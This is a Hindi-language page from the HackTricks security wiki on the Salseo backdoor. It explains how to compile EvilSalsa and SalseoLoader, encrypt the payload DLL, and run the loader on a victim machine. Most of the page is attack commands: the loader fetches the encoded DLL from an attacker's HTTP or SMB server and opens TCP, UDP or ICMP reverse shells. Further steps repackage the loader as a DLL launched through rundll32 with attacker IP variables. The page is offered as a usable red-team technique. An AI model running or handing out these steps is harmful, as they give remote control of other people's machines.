hacktricks/backdoors/salseo.md

12 KiB

साल्सियो

AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS रेड टीम एक्सपर्ट) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

बाइनरीज को कंपाइल करना

github से सोर्स कोड डाउनलोड करें और EvilSalsa और SalseoLoader को कंपाइल करें। कोड को कंपाइल करने के लिए आपको Visual Studio इंस्टॉल करना होगा।

उन प्रोजेक्ट्स को उस विंडोज बॉक्स के आर्किटेक्चर के लिए कंपाइल करें जहां आप उनका उपयोग करने वाले हैं(अगर विंडोज x64 को सपोर्ट करता है तो उस आर्किटेक्चर के लिए कंपाइल करें)।

आप Visual Studio में बाईं "Build" टैब में "Platform Target" में आर्किटेक्चर का चयन कर सकते हैं

(अगर आपको ये विकल्प नहीं मिल रहे हैं तो "Project Tab" में जाएं और फिर "<Project Name> Properties" में)

फिर, दोनों प्रोजेक्ट्स को बिल्ड करें (Build -> Build Solution) (लॉग्स के अंदर एक्जीक्यूटेबल का पथ दिखाई देगा):

बैकडोर तैयार करना

सबसे पहले, आपको EvilSalsa.dll को एन्कोड करना होगा। ऐसा करने के लिए, आप पायथन स्क्रिप्ट encrypterassembly.py का उपयोग कर सकते हैं या आप प्रोजेक्ट EncrypterAssembly को कंपाइल कर सकते हैं:

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt

विंडोज

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt

बैकडोर निष्पादित करें

एक TCP रिवर्स शेल प्राप्त करना (HTTP के माध्यम से एन्कोडेड dll डाउनलोड करना)

nc को रिवर्स शेल लिसनर के रूप में और एन्कोडेड evilsalsa को सर्व करने के लिए एक HTTP सर्वर के रूप में शुरू करना न भूलें।

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

UDP रिवर्स शेल प्राप्त करना (SMB के माध्यम से एन्कोडेड dll डाउनलोड करना)

रिवर्स शेल सुनने वाले के रूप में nc शुरू करना न भूलें, और एन्कोडेड evilsalsa सेवा करने के लिए एक SMB सर्वर (impacket-smbserver)।

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

ICMP रिवर्स शेल प्राप्त करना (पीड़ित के अंदर पहले से एन्कोडेड dll)

इस बार आपको रिवर्स शेल प्राप्त करने के लिए क्लाइंट में एक विशेष टूल की आवश्यकता है। डाउनलोड करें: https://github.com/inquisb/icmpsh

ICMP रिप्लाई को अक्षम करें:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

क्लाइंट को निष्पादित करें:

python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"

पीड़ित के अंदर, आइए साल्सियो चीज़ को निष्पादित करें:

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

SalseoLoader को DLL के रूप में संकलित करना जो मुख्य फ़ंक्शन निर्यात करता है

Visual Studio का उपयोग करके SalseoLoader प्रोजेक्ट खोलें।

मुख्य फ़ंक्शन से पहले जोड़ें: [DllExport]

इस प्रोजेक्ट के लिए DllExport स्थापित करें

टूल्स --> NuGet पैकेज मैनेजर --> समाधान के लिए NuGet पैकेज प्रबंधित करें...

DllExport पैकेज की खोज करें (Browse टैब का उपयोग करके), और Install दबाएं (और पॉपअप स्वीकार करें)

आपके प्रोजेक्ट फ़ोल्डर में फ़ाइलें दिखाई देंगी: DllExport.bat और DllExport_Configure.bat

Uninstall DllExport

Uninstall दबाएं (हां, यह अजीब है लेकिन मुझ पर भरोसा करें, यह आवश्यक है)

Visual Studio से बाहर निकलें और DllExport_configure चलाएं

बस बाहर निकलें Visual Studio से

फिर, अपने SalseoLoader फ़ोल्डर में जाएं और DllExport_Configure.bat चलाएं

x64 चुनें (अगर आप इसे x64 बॉक्स के अंदर उपयोग करने वाले हैं, वह मेरा मामला था), System.Runtime.InteropServices चुनें (अंदर Namespace for DllExport) और Apply दबाएं

प्रोजेक्ट को फिर से Visual Studio के साथ खोलें

[DllExport] को अब त्रुटि के रूप में चिह्नित नहीं किया जाना चाहिए

समाधान बनाएं

आउटपुट प्रकार = क्लास लाइब्रेरी चुनें (प्रोजेक्ट --> SalseoLoader Properties --> एप्लिकेशन --> आउटपुट प्रकार = क्लास लाइब्रेरी)

x64 प्लेटफ़ॉर्म चुनें (प्रोजेक्ट --> SalseoLoader Properties --> बिल्ड --> प्लेटफ़ॉर्म लक्ष्य = x64)

समाधान बनाने के लिए: बिल्ड --> बिल्ड समाधान (आउटपुट कंसोल के अंदर नए DLL का पथ दिखाई देगा)

उत्पन्न Dll का परीक्षण करें

Dll को कॉपी करें और उसे जहां परीक्षण करना चाहते हैं वहां पेस्ट करें।

निष्पादित करें:

rundll32.exe SalseoLoader.dll,main

यदि कोई त्रुटि प्रकट नहीं होती है, तो संभवतः आपके पास एक कार्यात्मक DLL है!!

DLL का उपयोग करके एक शेल प्राप्त करें

HTTP सर्वर का उपयोग करना और nc listener सेट करना न भूलें

Powershell

$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

सीएमडी

set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके: